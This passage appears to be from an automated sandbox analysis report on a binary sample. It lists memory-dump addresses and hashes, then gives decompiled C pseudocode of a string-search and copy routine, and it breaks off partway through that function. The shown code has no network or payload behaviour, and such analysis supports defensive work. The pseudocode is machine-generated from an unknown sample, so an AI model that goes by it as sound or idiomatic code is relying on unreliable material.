0x008b2958
0x008b295a
0x008b295a
0x008b295b
0x008b2960
0x008b2964
0x008b2966
0x00000000
0x00000000
0x008b2968
0x008b296c
0x008b296f
0x008b2971
0x00000000
0x00000000
0x00000000
0x008b2971
0x00000000
0x008b295a
0x008b28e5
0x008b28e8
0x00000000
0x00000000
0x008b28ea
0x008b28ee
0x008b28ee
0x008b28f1
0x008b28f4
0x008b28f7
0x008b28fb
0x008b28fe
0x008b2901
0x008b2901
0x008b2903
0x008b2906
0x008b290a
0x008b290c
0x008b290c
0x008b290f
0x008b2912
0x008b2915
0x008b2918
0x008b291b
0x008b291e
0x00000000
0x00000000
0x008b2924
0x008b2925
0x008b2926
0x008b292a
0x00000000
0x00000000
0x00000000
0x008b292a
0x008b29b6
0x008b29ba
0x008b29be
0x008b29c0
0x00000000
0x00000000
0x008b29cb
0x008b29ce
0x008b29d6
0x008b29da
0x008b29de
0x008b29de
0x008b29e1
0x008b29e5
0x008b29e9
0x008b29e9
0x008b29eb
0x008b29ed
0x008b2a0a
0x008b2a16
0x008b2a1a
0x008b2a1a
0x008b2a20
0x008b2a24
0x008b2a24
0x008b2a29
0x008b2a2d
0x008b2a31
0x008b2a33
0x00000000
0x00000000
0x008b2a39
0x008b2a3c
0x008b2a3e
0x00000000
0x00000000
0x008b2a40
0x008b2a44
0x008b2a48
0x008b2a4e
0x008b2a6b
0x008b2a6b
0x008b2a70
0x008b2a70
0x008b2a74
0x008b2a74
0x008b2a76
0x008b2a7a
0x008b2a7e
0x008b2a82
0x008b2a82
0x008b2a86
0x008b2a89
0x008b2a90
0x008b2a99
0x008b2a9c
0x008b2a9f
0x008b2aa5
0x008b2aa8
0x008b2aab
0x008b2aad
0x008b2ab0
0x00000000
0x00000000
0x008b2abc
0x008b2abe
0x008b2ac7
0x008b2ac7
0x008b2acb
0x008b2acf
0x008b2ad3
0x008b2ad3
0x008b2ad5
0x00000000
0x00000000
0x008b2adb
0x008b2add
0x008b2aee
0x008b2afa
0x008b2afa
0x008b2b00
0x008b2b00
0x008b2b05
0x008b2b09
0x008b2b0d
0x008b2b0f
0x00000000
0x00000000
0x008b2b15
0x008b2b18
0x008b2b1a
0x00000000
0x00000000
0x008b2b1c
0x008b2b22
0x008b2b33
0x008b2b33
0x008b2b38
0x008b2b3a
0x008b2b3a
0x008b2b3d
0x008b2b51
0x008b2b5d
0x008b2b5d
0x008b2b63
0x008b2b63
0x008b2b68
0x008b2b6c
0x008b2b70
0x008b2b72
0x00000000
0x00000000
0x008b2b78
0x008b2b7b
0x008b2b7d
0x00000000
0x00000000
0x008b2b7f
0x008b2b85
0x008b2b96
0x008b2b96
0x008b2b9b
0x008b2b9f
0x008b2ba3
0x008b2ba5
0x008b2ba8
0x008b2bab
0x008b2bad
0x008b2baf
0x008b2bb2
0x008b2bb4
0x008b2bb7
0x008b2bb7
0x008b2bb9
0x008b2bbd
0x008b2d0b
0x008b2d0b
0x008b2d12
0x008b2d14
0x008b2d1a
0x008b2d1c
0x008b2d1e
0x008b2d58
0x00000000
0x008b2d58
0x008b2d20
0x008b2d22
0x008b2d48
0x008b2d48
0x008b2d4a
0x008b2d4b
0x008b2d50
0x00000000
0x008b2d50
0x008b2d24
0x008b2d27
0x008b2d29
0x008b2d2b
0x00000000
0x00000000
0x008b2d2d
0x008b2d2d
0x008b2d2f
0x008b2d2f
0x008b2d30
0x008b2d35
0x008b2d39
0x008b2d3b
0x00000000
0x00000000
0x008b2d3d
0x008b2d41
0x008b2d44
0x008b2d46
0x00000000
0x00000000
0x00000000
0x008b2d46
0x00000000
0x008b2d2f
0x008b2bc3
0x008b2bc7
0x00000000
0x00000000
0x008b2bcd
0x008b2bcf
0x008b2c36
0x008b2c3b
0x008b2c3b
0x008b2c3e
0x008b2c41
0x008b2c44
0x008b2c46
0x008b2c59
0x008b2c5c
0x008b2c5c
0x008b2c62
0x008b2c6a
0x008b2c6a
0x008b2c6a
0x008b2c6d
0x008b2c74
0x008b2c77
0x008b2c78
0x008b2c7c
0x008b2c81
0x008b2c85
0x008b2c87
0x008b2c8d
0x008b2c8f
0x008b2c91
0x008b2cd6
0x00000000
0x008b2c93
0x008b2c93
0x008b2c95
0x008b2cc1
0x008b2cc1
0x008b2cc3
0x008b2cc4
0x008b2cc8
0x008b2ccd
0x008b2cd1
0x008b2cd9
0x008b2cd9
0x008b2cdc
0x008b2cdf
0x008b2ce1
0x008b2ce1
0x008b2ce3
0x00000000
0x00000000
0x008b2ce9
0x008b2ced
0x008b2cf3
0x008b2cf3
0x008b2cf6
0x008b2cf7
0x008b2cf9
0x008b2cfb
0x00000000
0x00000000
0x008b2cfd
0x008b2cff
0x008b2d60
0x00000000
0x008b2d60
0x008b2d01
0x008b2d01
0x008b2d03
0x00000000
0x00000000
0x008b2cf1
0x008b2cf2
0x008b2cf2
0x008b2cf2
0x008b2cf3
0x008b2c97
0x008b2c9a
0x008b2c9c
0x008b2c9e
0x00000000
0x00000000
0x008b2ca0
0x008b2ca3
0x008b2ca3
0x008b2ca5
0x008b2ca5
0x008b2ca6
0x008b2cab
0x008b2caf
0x008b2cb1
0x00000000
0x00000000
0x008b2cb3
0x008b2cb7
0x008b2cba
0x008b2cbc
0x00000000
0x00000000
0x00000000
0x008b2cbc
0x008b2cbe
0x00000000
0x008b2cbe
0x008b2c91
0x008b2c48
0x00000000
0x008b2c48
0x008b2bd1
0x008b2bd5
0x008b2bd5
0x008b2bd8
0x008b2bec
0x008b2bf8
0x008b2bf8
0x008b2bfe
0x008b2bfe
0x008b2c03
0x008b2c07
0x008b2c0b
0x008b2c0d
0x00000000
0x00000000
0x008b2c13
0x008b2c16
0x008b2c18
0x00000000
0x00000000
0x008b2c1a
0x008b2c20
0x008b2c31
0x008b2c31
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2c22
0x008b2c22
0x008b2c22
0x008b2c26
0x00000000
0x00000000
0x008b2c28
0x008b2c29
0x008b2c2f
0x00000000
0x00000000
0x00000000
0x008b2c2f
0x00000000
0x008b2c22
0x008b2d69
0x008b2d6c
0x00000000
0x008b2d6c
0x008b2bdc
0x008b2bde
0x008b2bde
0x008b2be1
0x008b2be1
0x008b2be5
0x00000000
0x00000000
0x008b2be7
0x008b2be8
0x008b2bea
0x00000000
0x00000000
0x00000000
0x008b2bea
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2b87
0x008b2b87
0x008b2b87
0x008b2b8b
0x00000000
0x00000000
0x008b2b8d
0x008b2b8e
0x008b2b94
0x00000000
0x00000000
0x00000000
0x008b2b94
0x00000000
0x008b2b87
0x008b2d73
0x008b2d76
0x00000000
0x008b2d76
0x008b2b41
0x008b2b43
0x008b2b43
0x008b2b46
0x008b2b46
0x008b2b4a
0x00000000
0x00000000
0x008b2b4c
0x008b2b4d
0x008b2b4f
0x00000000
0x00000000
0x00000000
0x008b2b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2b24
0x008b2b24
0x008b2b24
0x008b2b28
0x00000000
0x00000000
0x008b2b2a
0x008b2b2b
0x008b2b31
0x00000000
0x00000000
0x00000000
0x008b2b31
0x00000000
0x008b2b24
0x008b2d7d
0x008b2d80
0x00000000
0x008b2d80
0x008b2adf
0x008b2ae1
0x008b2ae1
0x008b2ae3
0x008b2ae3
0x008b2ae7
0x00000000
0x00000000
0x008b2ae9
0x008b2aea
0x008b2aec
0x00000000
0x00000000
0x00000000
0x008b2aec
0x00000000
0x008b2ae3
0x008b2ac0
0x008b2ac1
0x008b2ac5
0x00000000
0x00000000
0x00000000
0x008b2ac5
0x008b2d87
0x008b2d8b
0x008b2d8f
0x008b2d95
0x008b2d95
0x008b2d96
0x00000000
0x00000000
0x008b2d9c
0x008b2da5
0x008b2daa
0x008b2dad
0x008b2db1
0x00000000
0x00000000
0x008b2db7
0x008b2dbb
0x008b2dbf
0x008b2dbf
0x008b2dc0
0x008b2dc1
0x008b2dcb
0x008b2dd1
0x008b2dd4
0x008b2dd6
0x00000000
0x00000000
0x008b2dd8
0x008b2ddb
0x00000000
0x00000000
0x00000000
0x008b2ddd
0x00000000
0x008b2dbf
0x008b2a50
0x008b2a54
0x008b2a54
0x008b2a58
0x00000000
0x00000000
0x008b2a5e
0x008b2a5f
0x008b2a65
0x00000000
0x00000000
0x008b2a67
0x00000000
0x008b2a67
0x008b2de2
0x008b2de2
0x008b2de6
0x008b2de6
0x008b2de8
0x00000000
0x00000000
0x008b2dee
0x00000000
0x00000000
0x008b2df4
0x008b2df8
0x00000000
0x008b2df8
0x008b2e01
0x008b2e04
0x008b2e08
0x008b2e0a
0x00000000
0x008b2e0a
0x008b29ef
0x008b29f3
0x008b29f5
0x008b29f5
0x008b29f7
0x008b29f7
0x008b29fb
0x00000000
0x00000000
0x008b2a01
0x008b2a02
0x008b2a04
0x00000000
0x00000000
0x008b2a06
0x00000000
0x008b2a06
0x00000000
0x008b2e10
0x008b2e10
0x008b2e14
0x008b2e18
0x008b2e18
0x00000000
0x008b2e20
0x00000000
0x008b287e
0x008b2807
0x008b280a
0x008b280c
0x008b280e
0x00000000
0x00000000
0x008b2810
0x008b2814
0x008b2814
0x008b2816
0x008b281a
0x008b281d
0x008b281d
0x008b281e
0x008b2823
0x008b2827
0x008b2829
0x00000000
0x00000000
0x008b282b
0x008b282f
0x008b2832
0x008b2834
0x00000000
0x00000000
0x00000000
0x008b2834
0x008b2836
0x008b283a
0x008b283e
0x00000000
0x008b283e
0x008b2801
0x008b27bf
0x00000000
0x008b27bf
0x008b273b
0x008b273b
0x008b273e
0x008b2756
0x008b275a
0x008b2766
0x008b2766
0x008b276c
0x008b276c
0x008b2771
0x008b2775
0x008b2779
0x008b277b
0x00000000
0x00000000
0x008b2781
0x008b2784
0x008b2786
0x00000000
0x00000000
0x008b2788
0x008b278e
0x008b27a3
0x008b27a3
0x008b27a8
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2790
0x008b2790
0x008b2790
0x008b2794
0x00000000
0x00000000
0x008b279a
0x008b279b
0x008b27a1
0x00000000
0x00000000
0x00000000
0x008b27a1
0x008b2e25
0x008b2e25
0x008b2e28
0x008b2e36
0x008b2e2a
0x008b2e2a
0x008b2e2d
0x008b2e2d
0x00000000
0x008b2e28
0x008b2e40
0x008b2e43
0x00000000
0x008b2e43
0x008b2742
0x008b2744
0x008b2744
0x008b2747
0x008b2747
0x008b274b
0x00000000
0x00000000
0x008b2751
0x008b2752
0x008b2754
0x00000000
0x00000000
0x00000000
0x008b2754
0x00000000
0x008b2747
0x008b2728
0x00000000
0x008b2728
0x008b26de
0x008b2704
0x008b2704
0x008b2706
0x008b2707
0x008b270c
0x00000000
0x008b270c
0x008b26e0
0x008b26e3
0x008b26e7
0x00000000
0x00000000
0x008b26e9
0x008b26eb
0x008b26eb
0x008b26ec
0x008b26f1
0x008b26f7
0x00000000
0x00000000
0x008b26f9
0x008b26fd
0x008b2702
0x00000000
0x00000000
0x00000000
0x008b2702
0x00000000

Strings

@, xrefs: 008B2718

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: 514658a5806659513f6076f34127d345add43ea8f29ab4d8ac9a2bfa324cff9c
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: A6322B71A093924BDB258E28C4903AE7BD2FFC5314F1D866DE8A5DB396DA34CD41C782

Uniqueness

Uniqueness Score: -1.00%

Function 008B1730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008B1730(unsigned int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				char* _t181;
				signed int _t182;
				signed int* _t188;
				signed int _t192;
				signed int* _t193;
				signed int _t198;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t211;
				signed int _t214;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t244;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				char _t262;
				char _t263;
				signed int _t264;
				signed int _t265;
				void* _t268;
				signed int _t270;
				char _t272;
				unsigned int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t303;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t331;
				void* _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				char _t349;
				char _t350;
				char _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t363;
				unsigned int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;

				_v56 = 0;
				_t353 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t363 = E008A1030();
				_t391 = (_t388 & 0xfffffff0) - 0x34 + 4;
				_t181 = _v56;
				if(_t181 == 0) {
					 *_t363 = 0;
					L8:
					_t182 = _a8;
					_v52 = 0x40;
					_v56 = _t363;
					if(_t182 != 0) {
						__eflags = _t363;
						if(_t363 == 0) {
							_t260 = 0x40;
							_t240 = 0;
							L22:
							_t20 = _t240 + 2; // 0x80000001
							_t289 = _t20;
							__eflags = _t289 - 0x40;
							_t290 =  <=  ? 0x40 : _t289;
							__eflags = _t260 - _t290;
							if(_t260 < _t290) {
								_t368 = (_t290 >> 5 >> 0x1a) + _t290 >> 6;
								_t291 = _t290 & 0x8000003f;
								__eflags = _t291;
								if(_t291 < 0) {
									_t291 = (_t291 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t291;
								}
								__eflags = _t291;
								_t370 = _t368 + (0 | _t291 > 0x00000000) << 6;
								_push(_t370);
								_t261 = E008A1030();
								_t391 = _t391 + 4;
								_t292 = _v56;
								__eflags = _t292;
								if(_t292 == 0) {
									 *_t261 = 0;
									goto L35;
								} else {
									__eflags = _t261;
									if(_t261 == 0) {
										L33:
										_push(1);
										_push(_t292);
										_v68 = _t261;
										E008A10B0();
										_t261 = _v68;
										_t391 = _t391 + 8;
										L35:
										_v52 = _t370;
										_v56 = _t261;
										L36:
										 *((char*)(_t261 + _t240)) = _a8;
										_t188 =  &_v56;
										 *((char*)(_t240 +  *_t188 + 1)) = 0;
										L37:
										_t294 =  *_t188;
										if(_t294 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t241 = E008A1030();
											_t391 = _t391 + 4;
											_t192 =  *_a4;
											if(_t192 == 0) {
												 *_t241 = 0;
												L60:
												_t193 = _a4;
												 *_t193 = _t241;
												_t193[1] = 0x40;
												L61:
												_push(1);
												_push(_v56);
												E008A10B0();
												_v56 = 0;
												_v52 = 0;
												return _a4;
											}
											if(_t241 == 0) {
												L45:
												_push(1);
												_push(_t192);
												E008A10B0();
												_t391 = _t391 + 8;
												goto L60;
											}
											_t296 =  *_t192;
											 *_t241 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t262 =  *((char*)(_t192 + _t297 * 2 - 1));
												 *((char*)(_t241 + _t297 * 2 - 1)) = _t262;
												if(_t262 == 0) {
													goto L45;
												}
												_t263 =  *((char*)(_t192 + _t297 * 2));
												 *((char*)(_t241 + _t297 * 2)) = _t263;
												if(_t263 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t198 =  *_t294;
										if(_t198 != 0) {
											_t355 =  *_t353;
											__eflags = _t355;
											if(_t355 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t241 = E008A1030();
												_t391 = _t391 + 4;
												_t202 =  *_a4;
												__eflags = _t202;
												if(_t202 == 0) {
													 *_t241 = 0;
													goto L60;
												}
												__eflags = _t241;
												if(_t241 == 0) {
													L58:
													_push(1);
													_push(_t202);
													E008A10B0();
													_t391 = _t391 + 8;
													goto L60;
												}
												_t299 =  *_t202;
												 *_t241 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t264 =  *((char*)(_t202 + _t300 * 2 - 1));
													 *(_t241 + _t300 * 2 - 1) = _t264;
													__eflags = _t264;
													if(_t264 == 0) {
														goto L58;
													}
													_t265 =  *((char*)(_t202 + _t300 * 2));
													 *(_t241 + _t300 * 2) = _t265;
													__eflags = _t265;
													if(_t265 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t355;
											if( *_t355 == 0) {
												goto L52;
											}
											_v48 = _t198;
											_t372 = _t198 - 0x41;
											__eflags = _t372 - 0x19;
											_v64 = _t372;
											_t267 =  >  ? _t198 : _t198 + 0x20;
											_t243 =  >  ? _t198 : _t198 + 0x20;
											_t268 = 0;
											__eflags = 0;
											_v68 =  >  ? _t198 : _t198 + 0x20;
											_v36 = _t294;
											_t244 = _t355;
											while(1) {
												_t301 =  *_t244;
												__eflags = _t301 - 0x41 - 0x19;
												_t302 =  <=  ? _t301 + 0x20 : _t301;
												__eflags = ( <=  ? _t301 + 0x20 : _t301) - _v68;
												if(( <=  ? _t301 + 0x20 : _t301) == _v68) {
													break;
												}
												_t268 = _t268 + 1;
												_t244 = _t244 + 1;
												__eflags =  *((char*)(_t268 + _t355));
												if( *((char*)(_t268 + _t355)) != 0) {
													continue;
												}
												goto L52;
											}
											_t205 = _v48;
											_t303 = _v36;
											__eflags = _t244;
											if(_t244 == 0) {
												goto L52;
											}
											_t270 = _t303 & 0x0000000f;
											_v44 = _t205 + 0x20;
											asm("pxor xmm0, xmm0");
											_v40 = _t355;
											_t377 =  ~_t270 + 0x10;
											__eflags = _t377;
											_v48 = _t205;
											_v36 = _t303;
											do {
												_t356 = _t270;
												__eflags = _t270;
												if(_t270 == 0) {
													L69:
													_v32 = _t377;
													_t309 =  ~( ~_t356 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t309;
													_t378 = _v36;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t205;
														if(_t205 != 0) {
															break;
														}
														_t356 = _t356 + 0x10;
														__eflags = _t356 - _t309;
														if(_t356 < _t309) {
															continue;
														}
														_v36 = _t378;
														_t379 = _v32;
														__eflags = _t309 - 0x7fffffff;
														if(_t309 >= 0x7fffffff) {
															L77:
															_t309 = 0x7fffffff;
															L78:
															_v60 = _t309;
															_t206 = 0;
															__eflags = 0;
															_v68 = _t270;
															_v32 = _t379;
															while(1) {
																_t310 =  *((char*)(_t206 + _t244));
																_t272 =  *((char*)(_t206 + _v36));
																_t110 = _t310 - 0x61; // 0x7fffff9e
																__eflags = _t110 - 0x19;
																_t111 = _t310 - 0x20; // 0x7fffffdf
																_t311 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																__eflags = _t272 - 0x61 - 0x19;
																_t312 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																_t273 =  <=  ? _t272 - 0x20 : _t272;
																_t274 =  <=  ? _t272 - 0x20 : _t272;
																__eflags = _t312 - ( <=  ? _t272 - 0x20 : _t272);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t312;
																if(_t312 == 0) {
																	L83:
																	_t360 = _v40;
																	__eflags = _t244;
																	if(_t244 == 0) {
																		goto L52;
																	}
																	_t245 = _t244 - _t360;
																	__eflags = _t245;
																	if(_t245 != 0) {
																		_t279 = _t360 & 0x0000000f;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			L97:
																			_t320 =  ~( ~_t279 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																			__eflags = _t320;
																			while(1) {
																				asm("movdqu xmm1, [edi+ecx]");
																				asm("pcmpeqb xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t205;
																				if(_t205 != 0) {
																					break;
																				}
																				_t279 = _t279 + 0x10;
																				__eflags = _t279 - _t320;
																				if(_t279 < _t320) {
																					continue;
																				}
																				__eflags = _t320 - 0x7fffffff;
																				if(_t320 >= 0x7fffffff) {
																					L103:
																					_t320 = 0x7fffffff;
																					L104:
																					_t211 = _t320 >> 0x0000001f & _t320;
																					_t321 = _t320 - _t211;
																					__eflags = _t245;
																					if(_t245 < 0) {
																						L106:
																						_t245 = _t321;
																						L107:
																						_t280 = _a4;
																						 *_t280 = 0;
																						 *((intOrPtr*)(_t280 + 4)) = 0;
																						_t386 = _t211 + _t360;
																						__eflags = _t386;
																						_v64 = _t386;
																						if(_t386 == 0) {
																							L141:
																							_push(0x40);
																							_t241 = E008A1030();
																							_t391 = _t391 + 4;
																							_t214 =  *_a4;
																							__eflags = _t214;
																							if(_t214 == 0) {
																								 *_t241 = 0;
																								goto L60;
																							}
																							__eflags = _t241;
																							if(_t241 == 0) {
																								L147:
																								_push(1);
																								_push(_t214);
																								E008A10B0();
																								_t391 = _t391 + 8;
																								goto L60;
																							}
																							_t323 =  *_t214;
																							 *_t241 = _t323;
																							__eflags = _t323;
																							if(_t323 == 0) {
																								goto L147;
																							}
																							_t324 = 0;
																							__eflags = 0;
																							while(1) {
																								_t324 = _t324 + 1;
																								_t281 =  *((char*)(_t214 + _t324 * 2 - 1));
																								 *(_t241 + _t324 * 2 - 1) = _t281;
																								__eflags = _t281;
																								if(_t281 == 0) {
																									goto L147;
																								}
																								_t282 =  *((char*)(_t214 + _t324 * 2));
																								 *(_t241 + _t324 * 2) = _t282;
																								__eflags = _t282;
																								if(_t282 != 0) {
																									continue;
																								}
																								goto L147;
																							}
																							goto L147;
																						}
																						__eflags =  *(_t360 + _t211);
																						if( *(_t360 + _t211) == 0) {
																							goto L141;
																						}
																						__eflags = _t245;
																						if(_t245 != 0) {
																							L121:
																							_t137 = _t245 + 1; // 0x80000000
																							_t325 = _t137;
																							__eflags = _t325 - 0x40;
																							_t326 =  <=  ? 0x40 : _t325;
																							__eflags = _t326;
																							if(_t326 > 0) {
																								_v68 = (_t326 >> 5 >> 0x1a) + _t326 >> 6;
																								_t327 = _t326 & 0x8000003f;
																								__eflags = _t327;
																								if(_t327 < 0) {
																									_t327 = (_t327 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t327;
																								}
																								__eflags = _t327;
																								_t330 = _v68 + (0 | _t327 > 0x00000000) << 6;
																								_v68 = _t330;
																								_push(_t330);
																								_t387 = E008A1030();
																								_t391 = _t391 + 4;
																								_t226 =  *_a4;
																								__eflags = _t226;
																								if(_t226 == 0) {
																									 *_t387 = 0;
																									goto L133;
																								} else {
																									__eflags = _t387;
																									if(_t387 == 0) {
																										L131:
																										_push(1);
																										_push(_t226);
																										E008A10B0();
																										_t391 = _t391 + 8;
																										L133:
																										_t331 = _a4;
																										_t331[1] = _v68;
																										 *_t331 = _t387;
																										L134:
																										__eflags = _t387;
																										if(_t387 == 0) {
																											goto L61;
																										}
																										_t283 = _v64;
																										_t332 = 0;
																										while(1) {
																											_t228 =  *_t283;
																											_t332 = _t332 + 1;
																											 *_t387 = _t228;
																											__eflags = _t245;
																											if(_t245 == 0) {
																												goto L139;
																											}
																											__eflags = _t332 - _t245;
																											if(_t332 == _t245) {
																												 *(_t387 + 1) = 0;
																												goto L61;
																											}
																											L139:
																											__eflags = _t228;
																											if(_t228 == 0) {
																												goto L61;
																											}
																											_t387 = _t387 + 1;
																											_t283 = _t283 + 1;
																											__eflags = _t283;
																										}
																									}
																									_t333 =  *_t226;
																									 *_t387 = _t333;
																									__eflags = _t333;
																									if(_t333 == 0) {
																										goto L131;
																									}
																									_t284 = 0;
																									__eflags = 0;
																									while(1) {
																										_t284 = _t284 + 1;
																										_t334 =  *((char*)(_t226 + _t284 * 2 - 1));
																										 *(_t387 + _t284 * 2 - 1) = _t334;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											goto L131;
																										}
																										_t335 =  *((char*)(_t226 + _t284 * 2));
																										 *(_t387 + _t284 * 2) = _t335;
																										__eflags = _t335;
																										if(_t335 != 0) {
																											continue;
																										}
																										goto L131;
																									}
																									goto L131;
																								}
																							}
																							_t387 = 0;
																							goto L134;
																						}
																						_t361 = _t360 + _t211;
																						_t339 = _t361 & 0x0000000f;
																						__eflags = _t339;
																						if(_t339 == 0) {
																							L114:
																							_t245 =  ~( ~_t339 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t245;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t211;
																								if(_t211 != 0) {
																									break;
																								}
																								_t339 = _t339 + 0x10;
																								__eflags = _t339 - _t245;
																								if(_t339 < _t245) {
																									continue;
																								}
																								__eflags = _t245 - 0x7fffffff;
																								if(_t245 >= 0x7fffffff) {
																									L120:
																									_t245 = 0x7fffffff;
																									goto L121;
																								} else {
																									goto L118;
																								}
																								while(1) {
																									L118:
																									__eflags =  *((char*)(_t245 + _t361));
																									if( *((char*)(_t245 + _t361)) == 0) {
																										goto L121;
																									}
																									_t245 = _t245 + 1;
																									__eflags = _t245 - 0x7fffffff;
																									if(_t245 < 0x7fffffff) {
																										continue;
																									}
																									goto L120;
																								}
																								goto L121;
																							}
																							asm("bsf ebx, eax");
																							_t245 = _t245 + _t339;
																							goto L121;
																						}
																						_t245 = 0;
																						_t339 =  ~_t339 + 0x10;
																						__eflags = _t339;
																						while(1) {
																							__eflags =  *((char*)(_t245 + _t361));
																							if( *((char*)(_t245 + _t361)) == 0) {
																								goto L121;
																							}
																							_t245 = _t245 + 1;
																							__eflags = _t245 - _t339;
																							if(_t245 < _t339) {
																								continue;
																							}
																							goto L114;
																						}
																						goto L121;
																					}
																					__eflags = _t245 - _t321;
																					if(_t245 <= _t321) {
																						goto L107;
																					}
																					goto L106;
																				} else {
																					goto L101;
																				}
																				while(1) {
																					L101:
																					__eflags =  *((char*)(_t320 + _t360));
																					if( *((char*)(_t320 + _t360)) == 0) {
																						goto L104;
																					}
																					_t320 = _t320 + 1;
																					__eflags = _t320 - 0x7fffffff;
																					if(_t320 < 0x7fffffff) {
																						continue;
																					}
																					goto L103;
																				}
																				goto L104;
																			}
																			asm("bsf edx, eax");
																			_t320 = _t320 + _t279;
																			goto L104;
																		}
																		_t320 = 0;
																		_t279 =  ~_t279 + 0x10;
																		__eflags = _t279;
																		while(1) {
																			__eflags =  *((char*)(_t320 + _t360));
																			if( *((char*)(_t320 + _t360)) == 0) {
																				goto L104;
																			}
																			_t320 = _t320 + 1;
																			__eflags = _t320 - _t279;
																			if(_t320 < _t279) {
																				continue;
																			}
																			goto L97;
																		}
																		goto L104;
																	}
																	_t341 = _a4;
																	_push(0x40);
																	 *_t341 = 0;
																	 *((intOrPtr*)(_t341 + 4)) = 0;
																	_t241 = E008A1030();
																	_t391 = _t391 + 4;
																	_t233 =  *_a4;
																	__eflags = _t233;
																	if(_t233 == 0) {
																		 *_t241 = 0;
																		goto L60;
																	}
																	__eflags = _t241;
																	if(_t241 == 0) {
																		L91:
																		_push(1);
																		_push(_t233);
																		E008A10B0();
																		_t391 = _t391 + 8;
																		goto L60;
																	}
																	_t342 =  *_t233;
																	 *_t241 = _t342;
																	__eflags = _t342;
																	if(_t342 == 0) {
																		goto L91;
																	}
																	_t343 = 0;
																	__eflags = 0;
																	while(1) {
																		_t343 = _t343 + 1;
																		_t286 =  *((char*)(_t233 + _t343 * 2 - 1));
																		 *(_t241 + _t343 * 2 - 1) = _t286;
																		__eflags = _t286;
																		if(_t286 == 0) {
																			goto L91;
																		}
																		_t287 =  *((char*)(_t233 + _t343 * 2));
																		 *(_t241 + _t343 * 2) = _t287;
																		__eflags = _t287;
																		if(_t287 != 0) {
																			continue;
																		}
																		goto L91;
																	}
																	goto L91;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v60;
																if(_t206 < _v60) {
																	continue;
																}
																goto L83;
															}
															_t275 = _v68;
															_t382 = _v32;
															_t314 = _t244 + 1;
															__eflags = _t314;
															if(_t314 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v44 : _v48;
															_t205 =  <=  ? _v44 : _v48;
															__eflags =  *(_t244 + 1);
															if( *(_t244 + 1) == 0) {
																goto L52;
															}
															_v68 = _t275;
															_v32 = _t382;
															while(1) {
																_t244 = _t244 + 1;
																_t314 = _t314 + 1;
																_t276 =  *_t244 & 0x000000ff;
																__eflags =  *((char*)(_t314 - 1)) + 0xffffffbf - 0x19;
																_t277 =  <=  ? _t276 + 0x20 : _t276;
